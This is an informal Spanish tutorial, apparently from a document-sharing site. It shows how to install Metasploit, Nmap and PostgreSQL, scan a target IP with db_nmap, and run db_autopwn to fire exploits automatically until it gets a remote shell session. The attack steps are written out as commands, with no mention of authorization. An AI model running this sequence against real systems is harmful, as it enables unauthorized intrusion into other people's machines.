0 évaluation0% ont trouvé ce document utile (0 vote)
66 vues4 pages
Este documento proporciona instrucciones paso a paso para instalar Metasploit Framework, Nmap y una base de datos PostgreSQL para automatizar ataques de explotación de vulnerabilidades. Explica cómo escanear un objetivo con Nmap, almacenar los resultados en la base de datos y luego usar Metasploit para autopwnear el objetivo y obtener una sesión de shell remota.
Este documento proporciona instrucciones paso a paso para instalar Metasploit Framework, Nmap y una base de datos PostgreSQL para automatizar ataques de explotación de vulnerabilidades. Explica cómo escanear un objetivo con Nmap, almacenar los resultados en la base de datos y luego usar Metasploit para autopwnear el objetivo y obtener una sesión de shell remota.
Este documento proporciona instrucciones paso a paso para instalar Metasploit Framework, Nmap y una base de datos PostgreSQL para automatizar ataques de explotación de vulnerabilidades. Explica cómo escanear un objetivo con Nmap, almacenar los resultados en la base de datos y luego usar Metasploit para autopwnear el objetivo y obtener una sesión de shell remota.
wenas, este es un tutorial de como explotar vunerabilidades utilizando unas herr
amientas como el metasploit framework, el nmap, guardando nuestros resultados en
una base de datos, para despues automatizar el ataque, este ataque seria como l anzar exploits a diestra y siniestra, pero es una forma muy efectiva, y ademas A UTOMATICA voy a hacer y explicar, paso a paso como se instala el metasploit framework, ade mas del motor de base de datos que seria postgres. la ultima version de metasploit framework trae un self installer, al cual solo s e le da permisos de ejecucion y sale pa pintura se hace de la siguiente forma empesamos por instalar las siguientes librerias fundamentales para el funcionami ento de nuestro metasploti framework instalamos las dependencias de Ruby sudo aptitude install perl libnet-ssleay-perl openssl libauthen-pam-perl libpam- runtime libio-pty-perl apt-show-versions instalamos el cliente Subversion sudo apt-get install subversion y ahora para construir las extenciones nativas se instalan los siguiente paquete s sudo apt-get install build-essential ruby-dev libpcap-dev la utima version al momento (9-11-2011) es el metasploit-latest-linux-installer. run la descargamos una ves la tengamos descargada la pasamos a la carpeta personal nos vamos a la carpeta Descarga y ahi damos la siguiente orden sudo mv metasploit-latest-linux-installer.run /home/"usuario"/ con este comando anterior pasamos el archivo a la carpeta personal le damos permisos de ejecucion mediante el siguiente comando sudo chmod +x metasploit-latest-linux-installer.run ahora damos el siguiente comando para instalarlo parados en la carpeta personal ./metasploit-latest-linux-installer.run queda instalado en /opt/ !!lo anterio fue con el ultima version del metasploit framework, pero si queremo s hacer las cosas mas a pedal, nos conseguimos el un build anterior que generalm ente esta en .tar.gz!! tar xf framework-3.X.tar.gz sudo mkdir -p /opt/metasploit3 sudo cp -a msf3/ /opt/metasploit3/msf3 sudo chown root:root -R /opt/metasploit3/msf3 sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/ ahora pasamos a instalar el motor de base de datos, que en este caso sera postgr es los pasos son los siguente: sudo apt-get install postgresql-8.4 sudo apt-get install rubygems libpq-dev sudo gem install pg tambien se necesitan estos otros paquetes sudo apt-get install libreadline-dev sudo apt-get install libssl-dev sudo apt-get install libpq5 sudo apt-get install ruby-dev ahora entramos a postgres sudo -s su postgres Creamos un usuario createuser "usuario" -P Enter password for new role: (metemos un password) Enter it again: (repetimos el password) Shall the new role be a superuser? (y/n) n Shall the new role be allowed to create databases? (y/n) n Shall the new role be allowed to create more new roles? (y/n) n creando una base de datos: createdb --owner="usuario" "nombre de la base de datos" ahora abrimos el metasploit framework vamos a la carpeta donde esta el metasploit framework de la siguiente forma cd /opt/metasploit-4.1.2/msf3/ y digitamos el siguiente comando todo como superusuario msfconsole una vez se cargue el metasploit framework le decimos lo siguiente para que funci one el msf con la base de datos en en postgres msf> db_driver postgresql despues desde el msf nos conectamos a la base de datos que creamos anterior ment e msf> db_connect "usuario":[password]@127.0.0.1:5432/"nombre de la base de datos" wps1 para comenzar la base de datos con el metasploit framework hacemos lo siguiente ((((((( $ cat > ~/.msf3/msfconsole.rc db_driver postgresql db_connect msf_user:[password]@127.0.0.1:5432/msf_database db_workspace -a MyProject ^D bueno, esto anterior es opcional :) ))))))))))) ahora en metasploit framework, estas son las siguientes opciones que no da el ms f para trabajar con base de datos Database Backend Commands ========================= Command Description ------- ----------- creds List all credentials in the database db_autopwn Automatically exploit everything db_connect Connect to an existing database db_disconnect Disconnect from the current database instance db_driver Specify a database driver db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_status Show the current database status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspaces despues copiamos el siguiente comando db_nmap (opciones) ip a la cual vamos a atacar una ves termine el escaneo copiamos lo siguiente db_autopwn -p -e escribimos lo siguiente: sessions despues sessions -i 1 una ves hecho esto emos entrado al sistema :) para comprobar podemos escribir lo siguiente sysinfo Tutto by El Zorro o TheLatin HAPPY HACKING star ip communications esp 2010 STARIP E.S.P. Todos los Derechos Reservados.